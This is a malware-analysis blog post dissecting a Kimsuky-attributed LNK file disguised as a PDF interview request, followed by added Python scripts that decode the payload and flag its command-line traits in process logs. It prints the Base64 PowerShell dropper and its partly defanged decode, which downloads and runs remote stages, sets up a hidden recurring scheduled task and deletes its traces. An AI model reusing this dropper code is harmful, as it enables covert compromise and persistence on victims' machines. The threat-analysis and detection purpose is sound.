꿈을꾸는 파랑새

Today we will look at the malware KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk (2025.4.5), created by North Korea's Kimsuky group. Note that the attribution to Kimsuky is, as always, an estimate.
Hashes
File name: KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk
Size: 1 MB
MD5: 89bca3a895fc2c0b5e975372675f0049
SHA-1: 169aa69557f591296388c6abe81e6ed7e559c6ed
SHA-256: 6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9
I am not sure which organization the lure refers to, but its name points to a group that advocates Christian social engagement, dialogue between church and society, and "humanization" as a way to overcome alienation in today's society. Why it was targeted is unclear, but let's analyze the malware itself.

PowerShell code contained in the malware

Malware code

StringData
{
 namestring: Type: PDF File
 Size: 358 KB
 Date modified: 04/20/2024 11:23
 relativepath: not present
 workingdir: not present
 commandlinearguments:
 -windowstyle hidden -nop -NoProf(i)le -NonI(n)teractive -ExecutionPolicy Bypass -c "$
 ss=\"JGhoaCA9IEpvaW4(t)UGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIktCUyDrto
 HtlZwg7IiY7ZW0IOyduO2EsOu3sCDsmpTssq3shJ(w)o64yA66y47ZmU7JWE7Lm0642w66+4IOydtOyCvOyXt
 CDsnbTsgqzsnqXri5gpLmRvY3giOyB3Z2V0(I)C1VcmkgImh0dHBzOi8vZGwuZ(H)JvcGJveHVzZXJjb250ZW50LmN
 vbS9zY2wvZmkvYWlreDZrb3A4MDNsZnY5dWg4MWx0L3Rlc3QuZ(G)9jeD9ybGtleT1kejV5anNoMmk5dnJvOTFzeDY
 zZDAxamE0JnN0PWo4Ymltb2NqJmRsPTAiIC1PdXRGaWxlICRoaGg7ICYgJGhoaDsgJHBw(c)CA9IEpvaW4tUGF0aCA
 oJGVudjpBcHBEYXRhKSAiT3BlcmFVcGRhdGUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICg(k)ZW52OkF
 wcERhdGEpICJ0ZW1wMDc0ODYzNDg4OS5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
 W50LmN(v)bS9zY2wvZmkvaW5kdTZ5dndodnVubm9qY2ZxcDhjL2FwcGxlLWt5LnR4dD9ybGtleT1xdXd6N3g4aThwc
 nZzOGw1YW9oM25qNGprJn(N)0PWhtaDIxb2JiJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
 W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0c(i)B8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVV
 EY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24g(L)UV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQ
 XJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5v(b)kludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4Z
 WN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGg(g)KCRlbnY6QXBwRGF0YSkgX
 CJPcGVyYVVwZGF0ZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWdnZXIgPSBOZXctU2NoZWR1bGVkVGFza1(R)yaWdnZ
 XIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZVN
 wYW4gL(U)1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRkZW4
 7IFJlZ2lzdGVyLVNjaGVk(d)WxlZFRhc2sgLVRhc2tOYW1lICJPcGVyYVVwZGF0ZSAyMi0xNTQ1NDM0Mi03LjI4IiA
 tQWN0aW9uICRhY3Rpb24gLVRyaWdnZXIgJHR(y)aWdnZXIgLVNldHRpbmdzICRzZXR0aW5nczsgICRhYWEgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgImJvYXJkX2ZpcnN0LnBzM(S)I7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS80cTFtc3pqdmwzeXF5NHI1MHA4Yzcv(Y)XBwbGUtbHVjLnR4dD9ybGtleT1qd3o2dWFqbW1qZTJ5d3c3a2Y4ZmVvM2R6JnN0PWF3ODlheTN0JmRsPTA(i)IC1PdXRGaWxlICRhYWE(7)ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7DQoNCg==\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
 iconlocation: %ProgramFiles%\\Windows NT\\Accessories\\wordpad(.)exe

Code analysis

Error when running the malware

First, we can see that the file is disguised as a PDF and that its payload is Base64 encoded.
To understand the exact structure, decode the Base64 string with CyberChef.
That yields the following result.

Base64 decoding with CyberChef

$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "KxS 북한 수해 인터뷰 요청서(대문x아카데미 이x열 이사장님).docx";
wget -Uri "hxxps://dl(.)0dropboxusercontent(.0com/scl/fi/aikx6kop803lfv9uh81lt/test(.)docx?rlkey=dz5yjsh2i9vro91sx63d01(j)a4&st=j8bimocj&dl=0" -OutFile $hhh;
& $hhh;
$ppp = Join-Path ($env:AppData) "OperaUpdate.ps1";
$str = '$aaa = Join-Path ($env:Ap(p)Data) "temp0748634889(.)ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/indu6yv(w)hvunnojcfqp8c/apple-ky(.)txt?rlkey=q(u)wz7x8i8prvs8l5aoh3nj4jk(&)st=hmh21obb&dl=0" -OutFile $aaa; & $aaa; Re(m)ove-Item -Path $aaa -Force;';
$str | Out-File -FilePa(t)h $ppp -Encoding UTF8;
$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowS(t)yle Hidden -nop  -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:A(p)pData) \"OperaUpdate.ps1\"; & $abc;}"';
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30);
$settings = New-ScheduledTaskSettingsSet -Hidden;
Register-ScheduledTask -TaskName "OperaUpdate 22-15454342-7.28" -Action $action -Trigger $trigger -Settings $settings;
$aaa = Join-Path ($env:AppData) "board_first.ps1";
wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/4q1mszjvl3yqy4r50p8c7/apple-luc.txt?rlkey=jwz6u(a)jmmje2yww7kf8feo3d(z)&st=aw89ay(3)t&dl=0" -OutFile $aa(a);
& $aaa;
Remove(-)Item -Path $aaa -Force;
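As an added example (not code from the original post and not part of the Kimsuky toolset), the following Python script reproduces the CyberChef step and then pulls the triage facts out of the decoded PowerShell: the download URLs (re-defanged in the hxxp / (.) style used above), the dropped file names, the scheduled task name and its repetition interval, and whether the script hides its window and deletes its own stages. The sample argument string is constructed to mirror the structure shown above; its URLs and rlkey values are placeholders on example.invalid, while the dropped-file names and the task name are the ones from this page. The real LNK argument carries defang markers such as (t) inside the Base64, which must be removed before decoding.

```python
import base64
import json
import re

# Constructed sample modelled on the decoded PowerShell shown above (hypothetical,
# not the real payload): URLs and rlkey values are placeholders on example.invalid;
# the dropped-file names and the task name are the ones the page reports.
SAMPLE_SCRIPT = (
    '$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "lure.docx"; '
    'wget -Uri "https://dl.example.invalid/scl/fi/AAA/test.docx?rlkey=r1&dl=0" -OutFile $hhh; & $hhh; '
    '$ppp = Join-Path ($env:AppData) "OperaUpdate.ps1"; '
    '$str = \'$aaa = Join-Path ($env:AppData) "temp0748634889.ps1"; '
    'wget -Uri "https://dl.example.invalid/scl/fi/BBB/apple-ky.txt?rlkey=r2&dl=0" -OutFile $aaa; '
    '& $aaa; Remove-Item -Path $aaa -Force;\'; '
    '$str | Out-File -FilePath $ppp -Encoding UTF8; '
    "$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop'; "
    '$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) '
    '-RepetitionInterval (New-TimeSpan -Minutes 30); '
    '$settings = New-ScheduledTaskSettingsSet -Hidden; '
    'Register-ScheduledTask -TaskName "OperaUpdate 22-15454342-7.28" '
    '-Action $action -Trigger $trigger -Settings $settings; '
    '$aaa = Join-Path ($env:AppData) "board_first.ps1"; '
    'wget -Uri "https://dl.example.invalid/scl/fi/CCC/apple-luc.txt?rlkey=r3&dl=0" -OutFile $aaa; '
    '& $aaa; Remove-Item -Path $aaa -Force;\r\n\r\n'
)

# The LNK command line wraps that script in Base64 the same way the StringData
# block above does (constructed; the real blob additionally carries defang markers).
SAMPLE_ARGS = (
    '-windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss=\\"'
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode("ascii")
    + '\\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss)); & $ee"'
)

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_embedded_script(args: str) -> str:
    """Take the longest Base64 run in the LNK arguments and decode it as UTF-8,
    which is what [System.Text.Encoding]::UTF8.GetString(FromBase64String(...)) does."""
    runs = B64_RUN.findall(args)
    if not runs:
        raise ValueError("no Base64 payload found in the argument string")
    return base64.b64decode(max(runs, key=len)).decode("utf-8")


def defang(url: str) -> str:
    """Re-defang a URL in the hxxp / (.) style used in this write-up."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "(.)") + slash + path


def extract_indicators(script: str) -> dict:
    """Pull the triage-relevant facts out of the decoded dropper script."""
    task = re.search(r'Register-ScheduledTask\s+-TaskName\s+"([^"]+)"', script)
    interval = re.search(r"-RepetitionInterval\s+\(New-TimeSpan\s+-Minutes\s+(\d+)\)", script)
    return {
        "urls": [defang(u) for u in re.findall(r"https?://[^\s\"']+", script)],
        # Every Join-Path (...) "name" is a file the dropper writes to disk.
        "dropped_files": re.findall(r'Join-Path\s+\(.*?\)\s+"([^"]+)"', script),
        "task_name": task.group(1) if task else None,
        "repeat_minutes": int(interval.group(1)) if interval else None,
        "hidden_window": "-WindowStyle Hidden" in script,
        # Remove-Item -Path $x -Force right after "& $x" is the self-cleanup the page describes.
        "self_deletes": bool(re.search(r"Remove-Item\s+-Path\s+\$\w+\s+-Force", script)),
    }


if __name__ == "__main__":
    print(json.dumps(extract_indicators(extract_embedded_script(SAMPLE_ARGS)), indent=2))
```

Running the script prints the indicator dictionary; on a real sample, feed the cleaned `commandlinearguments` string from the LNK parser into `extract_embedded_script` and the dropped-file list gives you the paths to check on the host.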

Code analysis

1. Download and execute test.docx
Saves a .docx file in the temp path -> K?S 북한 수해 인터뷰 요청서(...)
& $hhh attempts to open the document from PowerShell
2. Create OperaUpdate.ps1 and insert code
The actual content of $str
$str is a sub-dropper that downloads and executes another piece of malware (apple-ky.txt)
It deletes the file right after execution to remove analysis traces
OperaUpdate.ps1 keeps re-executing apple-ky.txt
The commands are embedded internally (multi-payload structure)
3. Scheduled task registration (persistence)
Creates a scheduled task that runs 5 minutes later
It then repeats every 30 minutes
Execution command: PowerShell -WindowStyle Hidden -nop ... & OperaUpdate(.)ps1
Even if the user reboots, the task runs again, so this is the mechanism that keeps the malware running on the user's PC or laptop.
4. Additional execution and deletion using apple-luc.txt
Saves the apple-luc.txt file as board_first(.)ps1 -> executes it -> deletes it

VirusTotal result as seen in pestudio

Sub-payloads: second- and third-stage downloaders or information collection
The Dropbox links are no longer active, so the files could not be downloaded, but based on the script the files expected to be written are:
C:\Users\user\AppData\Roaming\OperaUpdate.ps1
C:\Users\user\AppData\Roaming\user.ps1
C:\Users\user\AppData\Roaming\board_first.ps1
C:\Users\user\AppData\Roaming\temp0748634889.ps1
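The four AppData\Roaming paths above are the on-disk artefacts, but the process chain also leaves a recognisable command-line pattern. As an added example (not from the original post), the following Python triage script scores constructed Sysmon-style process-creation records against the traits of this chain: a hidden window, -ExecutionPolicy Bypass, an inline Base64 script, and a .ps1 resolved under %AppData%. The records, the rule names and the benign inventory.ps1 record are all made up for illustration.

```python
import re

# Constructed process-creation records in a simplified Sysmon Event ID 1 shape
# (hypothetical timestamps and paths; the command lines mirror the ones on this page).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ts": "2025-04-05T10:00:01", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": r'"C:\Windows\explorer.exe"'},
    # The LNK launch: explorer.exe spawns a hidden PowerShell with an inline Base64 script
    # (the Base64 text here is a short constructed stand-in, not the real blob).
    {"ts": "2025-04-05T10:00:05", "image": PS_EXE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -windowstyle hidden -nop -NoProfile -NonInteractive '
                '-ExecutionPolicy Bypass -c "$ss=\\"JGhoaCA9Li4u\\"; '
                '$aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss)); '
                '$cc = $env:appdata; $dd = \\"user.ps1\\"; $ee = Join-Path $cc $dd; & $ee"'},
    # The scheduled task firing: the Task Scheduler service host runs OperaUpdate.ps1.
    {"ts": "2025-04-05T10:05:07", "image": PS_EXE, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": 'PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile '
                '-ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) '
                '\\"OperaUpdate.ps1\\"; & $abc;}"'},
    # A benign scheduled admin script for contrast (hypothetical).
    {"ts": "2025-04-05T10:06:00", "image": PS_EXE, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]

# Each rule is one trait of the chain described above; the rule names are this example's own.
RULES = [
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("exec_policy_bypass", re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I)),
    ("inline_base64", re.compile(r"FromBase64String|[A-Za-z0-9+/]{60,}={0,2}")),
    # A .ps1 resolved under %AppData% (the Roaming folder) is where every stage here lands.
    ("appdata_script", re.compile(r"(\$env:AppData|AppData\\Roaming).{0,60}?\.ps1", re.I)),
]


def match_rules(cmdline: str) -> list:
    """Return the names of all rules whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events, min_hits: int = 2) -> list:
    """Flag records that match at least min_hits rules; one trait alone is common
    in legitimate automation, the combination is what characterises this chain."""
    flagged = []
    for ev in events:
        hits = match_rules(ev["cmdline"])
        if len(hits) >= min_hits:
            flagged.append({"ts": ev["ts"], "parent": ev["parent"], "hits": hits})
    return flagged


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["ts"], f["parent"], ", ".join(f["hits"]))
```

Both malicious records are flagged while the plain -File launch is not; the parent field separates the initial LNK execution (explorer.exe) from the later scheduled-task runs (svchost.exe), which is the distinction an analyst needs when reconstructing the timeline.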
Since malware is being distributed in this way, always be careful and follow basic security practices.
